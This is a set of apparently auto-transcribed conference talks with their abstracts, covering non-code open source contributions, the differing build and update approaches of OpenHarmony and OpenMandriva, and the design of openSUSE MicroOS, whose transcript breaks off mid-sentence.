this term for you that's how I do, like make sure you give out your best, you know, because I found that most softwares like I said, you know how this professional outlook, which is very very bad. So this is where you come in to change the narrative and then fix those the pose. Okay. Yeah, the next one will be making monetary donations. Yeah, you can call it to open source like softwares, like, if you don't know how to design you, like, you don't know how to code or you don't have to modulate events and fix books and all that. You can help, you can sustain the space by making some money donations, you can fund some open source project and open source ideas. You can also fund some some events open source events, the way you can also put open source. And there's a platform for this is where open collective coming, where the you know it collects and disbuses, it's more transparent lead, you know to sustain and grow open source projects. Yeah. The last one advocacy. Yeah. BUB open source. Okay. Yeah, I'm I always like I know. Okay, I know someone, the rooty kega, she always wears the open source heart and open source gamut, you know, whenever people like, if you go to a tail, you will see like two or three contents that are related to open source, you know, you have to advocate for that space advocacy is a very great way to convert to the open source technology, you know, you've been open source, you know, you've been doing so selflessly. You can do this by choosing like softwares are up, does do it related to open source, and they're recommended to people. For example, use via media player, you all know that is as an open source software and you recommend to a friend of yours. Hey, bro, can you use the software, use the software it works very fine. It plays a 4k videos are replaced, so I placed 1080 videos and stuff like that. Yeah, this is a way where you can convert to open source is a great way you can sustain and advocate for the open source technology. I bet you if you do this, there will be a lot of people in the open source space. So, like, I'm really glad that that, like, the one I mentioned here, not related to something I have to do with code. So it starts from the fixing bulk, you know, the beta testing, the UI design, we're getting events and all, you see that is something you can do for the comfort of your house, you can help do this, or just have to do this be selfless, you know, so I'm here to encourage you that it's just going to go to open source, it shouldn't be limited that like open source has to do with code. Yeah, you can go to open source with codes, you can push some code, you can help do some stuff, you can do some dev ops and all but here, you can also put the code to open source writing codes. I'm so happy that I shared my thoughts today. If you, if you enjoyed my life talk today, just let me know. And if there are any questions, please, just shoot them below I will be able to answer them. Thank you very much.
|
A common misconception about contributing to open source is that you need to write code. In fact, it’s often the other parts of a project that are in urgent need of assistance. There are other ways of helping an open source project which include 1.Writing documentation, 2.Identifying bugs, 3.Testing code, 4.Answering queries from users, 5.Moderate/organize events, 6.User Interface & User Experience Design 7.Making a monetary donation, 8.Advocacy.
|
10.5446/53621 (DOI)
|
Hi, welcome to this custom session. I am Bill and today we are going to talk about two completely different approaches at building a Linux distribution, the ones taken by OpenHarmony and OpenMindRiva. I have attended any of my other talks, but I know I don't usually do the about me thing. I am not important, my topics are. But this time I have decided to make a bit of an exception because it does answer a few questions. Like, am I talking about one project I know well and another one I only understand basically? Or, am I trying to promote one approach by bashing another? And why am I just picking two different projects that are not exactly household names yet? Even though I of course hope both will be. So the answer to those is I have been working with OpenMindRiva since 2012. I am currently the president of the OpenMindRiva Association and I was a contributor to Mandrake back in its roots in 1998-1999. And more recently in November last year I have joined the Huawei OpenSource Technology Center, which is building OpenHarmony as a principle technologist. So I understand both projects. I am involved with decision making in both. And I think both approaches are perfectly valid. There might be reasons to go with either way. So let's take a look at what those reasons might be. Since both projects are not exactly well known yet, first of all we are going to take a quick look at what they are. Starting with OpenHarmony, its idea is to be more than an operating system. It can use multiple different corners. So it can run with Linux and with Zephyr and in the future probably a few others. We are looking at FreeRTOS, we are looking at LiteOS. There might be others in the future. The key goal is autonomous cooperative devices, multiple devices forming a distributed virtual bus that can share resources. Initial target devices are the Avenger 96 board, which is a 32-bit ARM v7, Cortex A7 and M4. And the Nitrogen 96 board, which is Cortex M4. OpenHarmony is built with Open Embedded in Yachto. So there is one command that builds the entire OS. It is a fully open project developed as an open source project, not so much an in-house product from the start. For more information there is a great talk by Stefan Schmidt, my co-worker in the Embedded Devroom at 5.30. You can look at what he is going to say or you can talk to us at the Huawei OSTC stand. Both of us should be there at some point. For this open Mantriva, that is a more traditional Linux distribution, also completely controlled by the community, continuing where Mantriva left off after the company behind it went out of business in 2012. Its route goes back to the first Mantraic Linux release in 1998. And it was originally targeting only x86 PCs, support for additional architectures, ARC64, ARMV7, H&L, RISC-5 was added later. Repositories contain 17,618 packages. And each of those packages is built and updated individually, assembled into an installable product with OMDV built ISO or OS image builder. For more information about this, you can go to the OpenMantriva website or visit the OpenMantriva stand at first. So let's take a look at how OpenHarmony is built. You download the operating system source, go into the directory, use the repo command to download a couple of git repositories that will get you bit-bake recipes, board description files, configuration files, describing how everything needs to be built, and everything will be built from sources. Then you initialize the environment, setting a couple of environment variables, adding a couple of extra bit-bake layers. That sets up the build system with everything that's needed. You set a couple more parameters and run bit-bake. And that takes care of everything else for you. The source for the actual components is downloaded, and that's already in the cache from previous build. And it's built according to what's in the bit-bake recipes and assembled into an image that works for the target machine you've specified. So you run this command and you get an image of the OS. OpenMantriva, in contrast, is built differently. Every upstream package, the library or an application is packaged in a separate RPM file. The package is then sent to ABF, the Advanced Build Farm, which sends it to builders for all supported architectures. At this time, that's x8664. ZNv1, which is a special case of x8664, count-risen processors. ARC64, ARMv7, H&L, RISC5, 64-bit, i686. And we recently got access to a PowerPC64 machine that will probably be added in the future. All the builds are done as native builds on a machine matching the architecture, or at least coming close in the case of RISC5, if you're currently using QEMU and faster machines. But that might change with the release of the new BeagleV and the Sci-Fi board. If the build succeeded on all the architectures, the packages added to the repositories, and if necessary, packages depending on it are rebuilt. When we want to build an operating system image, like the recent 4.2 release, there's a script that assembles the packages and builds it into an ISO image, or with the advent of non-x86 support. An image that works for a specific board in whatever format that target needs. None of the packages are rebuilt at that time. So why would people opt for those different possibilities? In Open Harmony, we are building everything from source and one go. We need to cross-compile. Cross-compiling is built into the OS builder by design. You certainly don't want to build an OS for Cortex M4 or Cortex M4 power device that would take forever. This approach makes it easier to build on top of different kernels, like Linux, Safari, and other options that will be added later with completely different requirements. For example, not every artist supports shared libraries. If you don't have shared libraries, you have to build everything in a completely different way. Build script from a Linux system that relies on a lot of pre-installed shared libraries will not necessarily work in that context. If you have a build script for Safari, that will not work nicely with the Linux system. This approach also makes it easier to work with boards that need custom kernels, custom bootloaders, everything. Those kernels will be put in at build time. There is no need to have pre-built packages for those kernels. There is no possibility of problems caused by ABI changes in the library, because everything is guaranteed to be built at the same time against the library version that is actually in use. Lastly, it also makes the user's license compliance tools like reuse easier, because all the sources in one place and the tool can check their license problems might be occurring. Gather statistics on how many GPL files are there, and make sure that no GPL files are linked into projects using a different open source, but not GPL compatible license and things like that. Why did we decide to use binary packages in OpenMandriever? One thing is there are lots of packages, 17,618 packages. Some of them are pretty big, like LibreOffice. They will take multiple days even on modern hardware. Given that OpenMandriever, or rather its predecessor, Mandrake started in 1998, try doing the same thing in 1998, and you will know why binary packages were really the only option. Another thing is for a larger system where not everyone is expected to update at the same time. Updating individual packages is often preferable over an OTA approach. On a larger system, not every user has the same packages installed. Only few people need, for example, KDE Plasma and GNOME at the same time. People generally pick one. That is obviously easier if they are separate packages. This approach also supports packages that cannot be cross-compiled, which sadly still exist. Another big difference is how they are updated. OpenHarmony is updated generally as an OTA image. The entire OS is updated in one go. Updates will be some variant of a file system image or a data to a previous file system image, assuming that we already know what is there before. Updates are sent to users when a new version has been completed and is tested. There are only updates that update the entire system, not just an individual part. Some details of disaster are being worked out because the first official OpenHarmony release hasn't happened yet. Some things may change slightly, but in general this is how things will go. In contrast, OpenManDriver is updated by updating individual packages. On the cooker, development tree and rolling release tree, people usually receive updated packages every day, many times several times a day. Users of the ROC, which is the stable tree, get only tested packages only once in a while. Machines are updated between releases. ROC is always a simulink to the current release. If you're installed 4.1 and told it to install ROC, you should have received an update to 4.2 a while ago. Users of the release tree stay on their release forever, even after its end of life. If you're installed 4.1 and you're opted to stay on the release tree instead of going to ROC, rolling or cooker, you will stay on 4.1 forever and you won't get 4.2. So, why would people prefer OTA updates, OpenHarmony style? They provide a guaranteed consistent system. People will always get a build that has been tested in its entirety. There's no possibility of a user getting an updated library without a corresponding application rebuilt against a library. So, no problem of an application crashing because a library has been updated and the application hasn't been rebuilt. There's no need for a lot of temporary storage for updated packages being downloaded on the running system. On systems that are extremely short on storage, like a Nitrogen96 port that has 512k storage, that is potentially a problem. Even the Nitrogen96 port is not necessarily the smallest target OpenHarmony, whatever I have. Of course, lastly, OTA updates are what people have come to expect in the consumer device space. There's nothing the user can do wrong. People expect to get updates without really noticing that their system has been updated. Why did we opt to do package updates on OpenManDreaver? One important point is dealing with the fact that not every system has the same packages installed. There's no point in sending a GTK update to a purest QT user or vice versa. There's no point in sending updated server packages to a desktop user or updating a LibreOffice to a server user or stuff like this. It gives users more control over what exactly they are updating, allows users to blacklist individual update data on quant, while still getting all the other features of a new release. And of course, it's also what people have come to expect in the Linux desktop and server. I think most people wouldn't take an OTA-style update too kindly on a traditional Linux distribution. We've seen a couple of small problems with either system, even though both have very good ideas and both work. When we started targeting non-X86 devices in OpenManDreaver, we ran into two problems. One is there's no defined standard format in which we can distribute images for non-PC devices. On a PC, we distribute an ISO file and that works for every PC, but that's not the case for other architectures. With most of the AOC64 servers these days, we can do pretty much the same. They support UEFI files and ISO files, but there's a lot of interesting devices from Raspberry Pi to RockPi to Pinebook Pro to the Pinephone to Si-5 Unleashed that simply don't. We still need some way to target those devices, which is easy in OpenHarmony. Many SOCs require a custom kernel with many patches that aren't in the upstream kernel tree yet. They touch files all over the kernel and conflict with patches that are needed for other SOCs. It's quite a challenge to build a binary package containing a kernel that can support all the needed features, for example, the current Qualcomm, mediaTek, and account all-vina.src, all at the same time. Again, for OpenHarmony, that's not a problem at all because the kernel is just put in at build time. It can just specify different sources for a different board. Many other traditional Linux distributions have decided to solve this problem. They're not supporting any devices that don't support UEFI. So, on some of the more server-centric Linux distributions, you will only find an ARC64 ISO that can be installed on modern ARC64 servers, but they won't work on a Pinebook Pro or on a Raspberry Pi, which is why you often see custom spins of those distributions for those boards. But in OpenMantreva, we care about those boards and we care about Linux on the desktop. The Pinebook Pro is a great way to get there. That's, by the way, the device I'm using to record this video. And we also care a lot about phones that are not under control of either Google or Apple. So, we want to get OpenMantreva on the Pinephone and other devices like that. So, limiting ourselves to UEFI is not the way to go. So, what could we do? Should we learn from OpenMantreva and rebuild the distribution the same way? The answer is partially. For the reason as mentioned before, we can switch to fully build this distribution from source all the time mode. That would still take weeks to get ISO done for testing. Then we fix one bug and build it again. And then the update system would clash. But the new OS image builder that is being used with count releases takes some ideas from OpenHarmony and its open embedded base. So, just like OpenHarmony, we have a per device config file that indicates which extra packages should be included for this device. And it can also specify a custom kernel repository, custom kernel config, device tree filename, custom Uboot repository and things like that. For example, this is what the device config file for Pinebook Pro looks like. It sets the architecture so all the binary packages will be built from the AX64 repositories. It pulls in the kernel firmware extra packages for the ViveHardTripZ. If a GUI is being installed, it pulls in the panfrost graphics driver. The kernel comes from a custom repository. The URL there is appended with hashtag branch. So, in order to make it possible to also pick a special branch. Then we set the kernel config, a couple of kernel extra config options, device tree filename, Uboot location, Uboot configuration. And that's it. OS image builder also allows to replace parts of the build script. So, any auto requirements like copy Uboot to one particular sector on the SD card, or create a FAT16 format, or create a CR partition number four containing a kernel, or other auto requirements that some boards have can be accommodated by that. But unlike the open harmony process, the openman driver OS image builder only builds the kernel in Uboot, so please, other components related to that board at build time, and then pulls in the binary package repositories like other openman driver builds. The script then outputs the install image for the right target device in the expected format, much like BitBake in open harmony would have done in the first place. So, take a base from this, will open harmony run into enmity limits with the other approach? Yes. As soon as we add a bigger target device, Avenger 96 and Nitrogen 96 are rather small devices that are not really expected to offer a lot of package choice or something, we will need some way to deal with packages in open harmony as well. That could be something similar to DNF or app, possibly OPKGE, which is already there in the Yachto base, or maybe something closer to the app gallery that exists on the de-googlyphied Huawei phones, assuming that its license can be adjusted to be fully open, or maybe even something entirely new that's even better that we haven't thought of yet. We'll deal with the problem when it gets there. Another takeaway is that there is clearly not one right way to build a distribution, and which approach works better often depends on the target devices. Project targeting a wide range devices will likely end up using a mixed form, like OpenMandriva's approach of having a more open harmony-like script that builds different kernels, different bootloaders, different installation images, but then pulls in the binary packages from the repository, or open harmony at some point adopting a more open-mandriva-like way to package applications for AI and devices. That's the basic idea. As you can see, both approaches are perfectly valid, both have advantages, both have disadvantages. Both projects can learn from each other, and both projects can also use an extra hand, so we would like to see you there. You can visit our GitLab repository at the location listed. Our website should be up soon, and I hope to see you there soon. If you have any questions, please feel free to ask them, either now or using the contact information that was provided in the beginning, or just find us at either the OpenHarmony stand or the OpenMandriva stand. Thanks for your attention.
|
There are many Linux distributions out there - and almost as many different approaches to how they're built. Two distributions on nearly opposite ends of the spectrum include OpenMandriva (which uses binary packages, builds and updates each package individually, applications are part of the OS, ...) and OpenHarmony (which builds the OS from source in one go, is updated through OTA images, and treats applications as something separate, ...) A developer involved in both projects explains how the 2 projects go about building their respective OSes, why both projects made the choices they made, how the approaches differ from a developer and user perspective, and what approach works better for what particular use case.
|
10.5446/53622 (DOI)
|
Hello everybody at Fastem. My name is Richard Brown. I'm here from the OpenSuser project to talk to you about OpenSuser Micro-IS. First, a little bit about myself. I've been an OpenSuser contributor since the project began. I've been working at SUSE now since 2013. I'm a really passionate advocate of rolling releases. In the past, I used to be a QA engineer. These days, I'm a Linux distribution engineer in SUSE's future technology team. I'm working mostly on two different rolling distributions, Micro-IS and Qubic, which is what I'm here to talk to you about today. In my spare time, I'm a rather avid photographer. When it comes to talking about what is Micro-IS, I actually find it easier to ask the question, why is Micro-IS? As a team, we've been looking at the way the world works these days. Even though Linux distributions are typically doing the same thing they have been doing for the last 20, 30 years, computers aren't the same as they have been for the last 20, 30 years. They're not just laptops, desktops and servers anymore. Even when they are your traditional laptop, desktops or servers, people aren't using them the same way they used to. Starting with an example of what isn't a traditional device. If you think of these IP webcams, these are small, they say IoT devices, but they are in practice a small micro-computer. And this computer has firmware and an operating system, and then people realise they've never actually updated it. There are millions of these devices out there. They've all quite often got malware or are susceptible to being contributing to things like malware bots and botnets. But quite often manufacturers are very, very nervous about updating them because a failed update is going to cause many, many unhappy customers. This isn't just a problem in the tiny IoT devices space, in the bigger, more widespread, embedded world. You have examples like this with O2 in the UK, where they have their entire network of devices across the entire country, all doing their cell phone towers, where your phone connects to to get its network access. And in the 2019, they rolled out an update to all of these devices, and that update effectively bricked every single one of their cell phone towers and also broke the recovery mechanism for a failed firmware update. So the anyway of fixing the issue was like literally sending engineers out to every single cell phone tower in the country. Meanwhile, no one can get any cell phone access, no data, no 4G. Repair took a really, really long time. And it really kind of stressed the need for being able to have update mechanisms where sort of rollback and sort of easy recovery were like absolutely key part. Another kind of more esoteric example of what you could say is IoT or Edge is something like this Vektron Siemens train, you know, which in reality is kind of 300 device rolling data center. You're talking about a train that has 300 different sensors, all needing to be available pretty much all of the time. You've got hundreds of these cars out there, billions of bits of data, you know, literally terabytes of data all needing to be processed. And, you know, no, no, no cellular uplink is going to be a sensible way of uploading this data all of the time. So quite often this data has to be locally analyzed, locally processed, so you effectively have a full blown data center moving around this country on a train the whole time. And then they need to be able to be updated via these slow remotes links and then be able to, when they're back in the depot, when they're able to have a decent internet connection, then send the pre-processed data up to some big data cloud for actual proper deeper analysis. And of course, another example is sort of this sort of really big cluster example of, you know, not just a few machines where you can quite easily micromanage them sort of the very, with sort of the traditional sort of pet cattle analogy, you know, these aren't machines which are going to be cared for micromanaged or micromanageable. You're talking about hundreds of machines, far too many for any one person or even a team to easily look after. They all need to be the same operating system version. We'll be talking about some kind of workload orchestration on these clusters such as Kubernetes. And the need really strikes home with that when you've got these hundreds or thousands of machines to have automatic update, automatic rollback. And if there is any kind of machine, problem machine, it's far more likely that that machine is going to be killed and then replaced rather than, you know, carefully lovingly bought back to attention and brought back to regular working behavior. So, you know, the teams, my team's been kind of looking at this and realizing that, you know, in many respects, we're living in a new world where the cloud is ambiguous. Everybody has cloud options now they might not all be using it. But if you need more hardware on the cloud, you know, a few more machines is just a credit guard away. You've got all of these IoT devices out there, always single purpose, all needing to have some way of being updated. Even in sort of the traditional data center, you know, virtualization is endemic, you know, there's more services running in more VMs not and when customers or users need to add more services, you don't necessarily just add more machines to their networks, they can add more VMs to their existing infrastructure that they have. And you have of course containers which helps this sort of grease the wheels of this new world where you've got the sandboxing limiting incompatibilities and isolating service problems. So if something does go wrong, it doesn't necessarily impact the entire system or bring down other services that are unrelated to the container or containers that are misbehaving. Outside of the data center and server worlds, you know, I've also been looking at this from sort of the desktop side. And if you look at the education industry, which I used to work in before I got into all this IT stuff, then you'll see that, you know, in the US at least, you know, the standard desktop is more and more disappearing, or many of us gone, and the kind of main teaching aid in these Chrome OS networks, you know, basically desktop appliances, all the applications being nice, simple lightweight apps, they're easier to manage. They're easier for less and less. That's IT literate staff to help manage for you. So you don't need to have a complicated IT department looking after it. And okay, that's in the US, which might not necessarily be a perfect example of the entire world. But if you look at the rest of the world outside the US, you'll see over the last years, this trend is starting to grow there as well, where even Windows and Mac, and even Linux are getting sort of pushed out of the education industry, and Chrome OS is typically becoming more becoming the first experience that students have in the classroom. And so when you're thinking about, you know, what should be the first, or what should be the root for desktop Linux, makes me start wondering, you know, maybe the root needs to be more aligned with what Chrome and Chrome OS are doing in the same way that we used to align desktop Linux to kind of poach Windows users. Maybe we need to start thinking about, you know, Chrome OS to be a sort of easy on ramp for people who basically learned Chrome OS in the school as they've been growing up. Regardless, if these machines are end user devices or running a data center, there are some pretty common requirements that run through despite these very different use cases. These operating systems need to be very small. The users don't want to necessarily micro manage these machines in the same way they've been traditionally doing so. The smaller the machine, the less there is to change, the less there is to manage, the less updates. They also is a very common need for a very predictable operating system. You know, it needs to work in exactly the way it's expected to. Once it's working in that way, it needs to stay that way and not change its behavior unexpectedly. It needs to obviously be reliable and work. In order to these requirements, you're talking very much of appliances or single purpose machines. So not everybody is going to have the same requirements, exactly the same set of examples. So having automatic personalization, so it's very easy for a different school or different company or different manufacturer embedding this into their devices. We have to personalize it specifically for the use case. Like discussed with the O2 examples and the IoT examples, any kind of failure of updating needs to be able to automatically roll back. There's lots of places, especially in the IoT world, where real time is a hard requirement. And in almost all these cases, we're talking about having containers or some kind of containerized framework being sort of the first class workload, if not the sole workload running on top of this operating system. And with these requirements, with these examples, with these use cases, regular Linux just isn't good enough anymore. It breaks my heart to say that as a long term open SUSE user, but regular distributions are like Swiss Army knives. There's a ton of services, a ton of features, but those tons of services and features end up being the biggest problem. There's always an increased chance that they're going to be incompatible or adding some new service, break some other service. And I've had plenty of cases where even really well managed machines have an issue on service A, which then kind of cause a cascading failure with different services, BCD, et cetera. And it can be a real nightmare digging down, figuring out the root cause, analyzing that and then bringing the system back up and running. And these are all kind of ways of living that just don't really fit with this sort of new world order of embedded devices, single purpose devices and appliance desktops. You see this today in the data center with VMs. You don't have a situation where you, like you were traditionally where you install a server and then you put on your mail server, your DNS server and some identity system all on the same machine. Typically, even in the most basic server environment, you're dealing in VMs where you'd have a single VM for your DNS, a single VM for your mail, a single VM for your identity management. And these installations are all going to try and individually have as little variation between them, but also have as minimal number of services between them. Quite often, unfortunately, it's patching gets ignored. It's easy as quite sometimes to rip and replace these VMs and actually update them. But when you do see these sort of single purpose VMs being used, if someone needs to add more services, they don't go into an existing VM modify. They're typically just adding more VMs or in the cloud, adding more cloud installations or potentially IoT devices. So this concept of single purpose systems isn't that new. But on the flip side, there are many operating systems or Linux distributions out there that are kind of focused on maximizing and optimizing for this way of working. Whereas at the moment, though, people are quite often taking traditional distributions and hand crafting them, building these single purpose custom installations, quite often having lots of issues with configuration management, having quite a lot of issues with keeping them patched and optimizing these instances for sort of minimal RAM usage, minimal CPU usage, minimal disk usage is incredibly hard work. And nobody is perfect. And especially no sys admin is perfect, speaking as a home of sys admin, even the best designed and maintained systems have flaws and will fail. These flaws need to be prevented. And they need to at least, if not be totally prevented, at least be mitigated so they don't get in the way of what the system is meant to be doing. And in my team, this is kind of what this philosophy of anything that's worth doing is worth undoing, you know, no issue just appears out of nowhere. So if you're able to do something on a system, there's always a chance that change might be wrong. So there needs to be some way of undoing every single change you make to a running system. And this is really where microarray comes in. As an open source of variants that's really designed to address this whole collection of issues requirements and this new philosophy of single purpose systems. It's predictable. In that we have every single time you're installing microarray, it's going to behave the same way. It's going to be updated in a very predictable fashion and be predicted and only be updated in a mutable fashion. Once it's deployed, it's not going to change without you actively changing. And if you do make that change, it'll be done in a predictable and rollbackable way. These updates will be reliable with automatic updates and automatic recovery, automatic rollback of any failed updates. And we keep microarray as small as it can be to do that one job it needs to do. Generally speaking, this means having a very minimal operating system with some kind of container runtime or some containerized framework depending on the use case and then having all the applications and the other services actually running containerized or sandboxed. From an architecture perspective, microarray is just built as a variant of OpenSUSE or tumbleweed. The main tumbleweed rolling release always releasing the latest stuff or tumbleweed gets built consistently in the OpenSUSE or build service. So that's part of the reliability story there. It's all be reproducibly built. It also gets tested in the OpenSUSE or OpenQA. And in the case of microarray, we link all this together. So it gets built together with the rest of tumbleweed, it gets tested together with the rest of tumbleweed, and then need build or test failure in either tumbleweed or microarray actually prevents the release of either distribution. You can really see that they're going to tie together at the hip. The operating system is released right now is pretty small. So a typical microarray installation on bare metal is going to be about 619 megabytes. Most of that because of the kernel, because we need the kernel there for all the bare metal hardware drivers. If you get rid of that and want to optimize it away and just have microarrays for the MMH, you're talking more about 380 megabytes. You'll be using a much more optimized kernel default base package. There isn't any firmware options there, of course. But yeah, much smaller, much lighter. And we're always looking at ways of optimizing and shrinking it down even further than that. As a sysadmin, I used to always think, you know, once I've deployed something, I never want to touch it again. You know, patching it's always going to be dangerous. I don't really want to risk it if I don't have to. So yeah, this is a mantra that's very true. But at the same time, you know, we still have to update systems. There's still always security issues. There's still always functionality updates we need. With this is OpenSUSE and MicroRS, we have a transactional update stack. So any change to the system can only happen because by default, MicroRS is actually set to read only. So the updates can only happen via this mechanism, which is always done reliably, always done reproducibly and always done reversibly. This entire process is atomic. So it either entirely happens or nothing happens at all. You don't get sort of a partial update of a system. It's everything or nothing. And the way we apply it, it is done in a way that applies without impacting the running system in any way, manner or form. Literally, the sort of the file management parts, the patching all happens in a separate change route or in a separate BTFS sub volume. Nothing of nothing in the original in the current running file system gets impacted. And then you flip to that new file system in a single atomic operation. We use this perspective. So the file system ends up looking like this. You have a BTFS sub volume basically containing a root file system, BTFS snapshot. This is read only. You're currently booted to the one called current route. And they'll be the historical previous ones in this case, or previous versions of previous MicroRS installations. When the system wants to be updated or the users either triggered it or more realistically, the system de-service is triggering it as part of an automated process. That current route file system is going to be cloned as a snapshot process in BTFS. That clone gets turned to read write. So again, nothing changing the running system, but that read only clone gets changed to a read write clone. That then gets updated using your typical zip or up or zip ad up process. That thing gets changed back to read only. So all those changes are encapsulated in one single process. And that new snapshot gets marked as the next boot target. So your atomic operation for activating the new file system is reboot, which also has a convenience side effect of also meaning all your processes are shut down. So there's no nasty side effect of running process, you know, suddenly finding its binary so swapped out towards databases and compact or something nasty like that. Then after rebooting, you get that new snapshot as your current route file system. If you don't reboot and you just keep on doing updating, only that last version takes effect because we don't necessarily know if the previous one sort of in but also taken after the current boot, but before the next boot are actually any good. So in transactional update now, we actually have some capability of continuing a snapshot. So you can have one update and then continue it at a second update or more realistically, if you're just scripting this as a standard system upgrade, you will have to discard a system upgrade you never use and never patched and never tested. In fact, on the next reboot, they can get thrown away because we know they're not any good. Or we don't know if they're any good or not more accurately. And then you boot into the current new latest last route file system with your last version. All of this is powered by BTIFS. One of the reasons we went down this route is because it is incredibly space efficient. Each of these snapshots only contains the diffs, not like a USR-AB partition where you've got multiple versions of everything all being stacked up. It also means we can cover things like the configuration in ETC. So we're not just rolling back the binaries to the version that used to be, but also rolling the configuration back to the version that used to be. There's no new packaging format required. So we're not doing anything with like RPM or RESTry and having to repackage everything into this new format. There's no size limitations for partitions or operating systems. It's really easily enhanceable. We can keep on changing this and we have with adding new functionality for handling things like ETC better, potentially handling other sub volumes. And it's incredibly reliable because even if the entire boot configuration gets messed up or the entire boot configuration is still in a previous snapshot. So all we really need is the smallest modification to grub to give you a grub menu of all the previous snapshots. And basically, if long as that patch and that configuration file is working, nothing can prevent the system from being bootable. You don't need to have a customized init.d. You don't need to have a customized kernel. It's just a very small change to the bootloader, which keeps the threat service down for any sort of boot blocking issues. If anything goes wrong, rolling back is a simple case of throwing away the snapshot that you don't like. You're immediately going to go back to the snapshot that was booted last time. So nothing's changed on disk. This can be done as often as you need. There's this sort of no waste or no risk involved in it at all. We actually have a process called health checker, which does this or can do this as part of built-in automation of micro-OS. So checking for errors is part of the boot phase. If there is an error with that snapshot, it will roll back to the last working one. Potentially also, health check and even look at the weird transient issues where the snapshot used to work, but then it suddenly started breaking again suddenly, in which case it will actually try rerouting just like a sysadmin. And if that doesn't work, then actually shut itself down and inform the sysadmin. So you know something's gone wrong. One limitation of health check is, of course, you need access to the hard disk. But of course, if the system doesn't have a hard disk, it's probably not booting anyway. So it's not really that much of a massive limitation, but it's a thing of when is a system worth looking after or trying to recover? If disk is broken, there's probably not much of a system left to look after. All of this is deployed actually using the traditional open-suzer way of doing things. So very secure update mechanism, everything delivered by HTTPS, every package is signed, every repository is signed so you can't just have an intruder flipping out good new packages with old and secure ones. All of these are verified automatically by the package manager. If there's any issue with any of that chain of trust or in fact any dependency issues of like this new package doesn't work with something that's already installed, the system doesn't get updated at all. And even if you try and do an update and then something goes wrong during that update process, be it an issue with the package or just something breaking, the entire snapshot gets immediately deleted. So again, reliable, reproducible and always moving from one known state to another known state. Micro-S, we are targeting multiple different architectures basically on ARM AR64. We've got support for both firmware or U-boot with EFI and EFI. On XET64 we support both legacy bias and UEFI including secure boot. And in terms of memory requirements, we're really only asking for about 512 megabytes plus the workload. And in terms of disk space, we can boot from as small as four gigabytes. We normally say about 10 realistic plus the workload. Fourth, yeah, well if we can see, if you do the math, we've only got a 600 meg image for a system that can do booting from bare metal. So that four gigabytes is to kind of give us scope for a bunch of change over time with those snapshots. If you've got a really tiny disk and you really want to squeeze it in on there, of course you can, you're just going to have to be very strict in managing how many previous snapshots you have, for example, probably a more than one. Which is a perfectly legitimate configuration. So these kind of requirements are more like guidelines so people can just deploy it, forget about it. When it comes to ways of deploying it, we've got a whole raft of different ways of installing it. There are actually DVD and net ISOs like traditional OpenSousers. You have a nice customizable installer where you can streamline-compet traditional OpenSouser where you can install it, pick what you want, pick the system role, tinker and tune with it how you want. We have pre-configured images using various VM platforms, various cloud platforms and Raspberry Pi's. All these are ready to use. By default they're configured without a password, but they're configured so they can be easily used with a process called combustion recognition, which I'll talk about in a second. Or we have an Assault-based installer called Yomi, which you can find online on GitHub, which basically installs directly using SaltStack. So it's completely serverless, just have a system boot into a Yomi boot environment and deploy itself entirely from code, deploy it in Salt. Ignition, you might have heard about previously. Originally came from CoreOS, the pre-Fordora CoreOS, which was designed as a replacement for CloudInit. I'm going to skip over it quickly because personally I don't like it that much. Instead I'm going to talk about combustion, which is basically there to do pretty much the same thing. Configure the system as part of that first boot, especially for those cloud images. A nice thing with combustion is it runs as part of the InitRD, but it runs as a basic shell script. You can pretty much do everything. You can write in the shell script. I wrote a blog post about this you can find on my website where you can add files easily. You can install packages, you can add users, set up devices, repotition the entire system. Of course, you've got that running off a USB stick or a VM device, but then it's easy to reproduce that across all of your machines. They're all configured exactly the same way on that first boot, simple, done, dusted, and then you never have to worry about it again. Once the system's deployed, how are you going to run your services on it? With MicroS, you could just install a traditional RPM using Trinidad transactional update. I wouldn't recommend that for more than one or two RPMs in that traditional, simple, single use case example. But one perfect, perfect opportunity is, of course, if your micro system has a single use of running containers, then we would really recommend using something like Podman, which is an alternative to Docker for standalone container hosts. It doesn't have a daemon, supports your standard Docker OCI containers and pods. It's all the sort of familiar commands of Podman, pull, Podman, run. That's pretty much what you need to know about it. In the case of OpenSuser, we have a registry. All of these are built in OBS. It's very easy to contribute new containers to our OBS registry if you feel like adding to the ecosystem. They're always rebuilt automatically when any package in the OpenSuser family, be it Leap or Tumbleweed, are then modified. You get a fresh container out of it. All these images are signed and notarized. And for example, to the base images are things like Tumbleweed and Leap, which are just a simple Podman pull away. We also have a debugging tool, which is really useful even if you're not running micro as a container host. Because you've got a read-only root file system, if you need to debug the system, you can't just zip it in through and get your debug tools there. The nice thing with toolbox is you can just run toolbox. It downloads this container, runs it as an interactive shell, and then you basically have a tiny VMS container running on that machine where you can then install those debugging tools. And the current root file system is mounted in there. It's still read-only, so you can't go modifying stuff untransactionally. But it does mean you can see the system as it's running, interrogate the currently running process, figure out what's going on, install what you need. And if you want, that can be persistent between uses. So on one of your systems, you can have the same toolbox over and over again, which is really useful if you have a problem with recurring, you don't need to always initialize your toolbox from zero. In my case, I'm using micro as pretty much like all over my life now. I've no longer got any traditional open-suser servers at all, nothing but open-suser leap. My next cloud is micro as container host running a couple of next cloud containers. My blog is another micro as container host running a bunch of Jackal containers, either as sort of long running processes for things like engine X or as like cron jobs for Jackal itself. So it, you know, download and get my website builds it and then dumps it onto the system. Also got a rather nice emulation station installation. So I plugged into the back of my TV running retro games and I was ever micro server running all on micro s or using containers. Probably got more examples to I because I don't have a single non micro s machine server wise in my life anymore. Right off when I talk about micro s, some people get the wrong end of the stick with a few things. So kind of just to kind of kill that out the way in case you're going down the wrong road, you know, micro s is not an operating system to run inside containers. It's an operating system to run containers or other workloads on top of in the case of open-suser. We already have perfectly usable and perfectly small container operating systems. You know, the busy box container from open-suser is nine megabytes small. It's tiny as heck and this is perfectly reusable for any project you need or the tumbleweed container. We now has only 90 megabytes of still relatively small has everything you need to get your container installed at the service you want job done, be it with podman or Docker build or builder or key wheel, whatever you're using to build your containers. Now alongside open-suser micro s, we have a side project called open-suser cubic, which is a sort of micro s derivative focused specifically on containers and more specifically than that Kubernetes in particular. Like micro s, it's built entirely and tested entirely as part of the tumbleweed release process. But it's really dealing with the issues that you have with Kubernetes. You know, it's a Kubernetes being a framework which is really focused on that example of the large cluster we're talking about earlier, you know, hundreds or thousands of machines running hundreds or thousands of containers on very large clusters, spanning lots of VMs, potentially spanning also lots of geographies if you've got a very complicated cluster or arrangement of multiple clusters. And there is a ton of moving parts. You've got the containers themselves, you've got Kubernetes, you've got the container runtime underneath. And all of this stuff quite often has to be configured 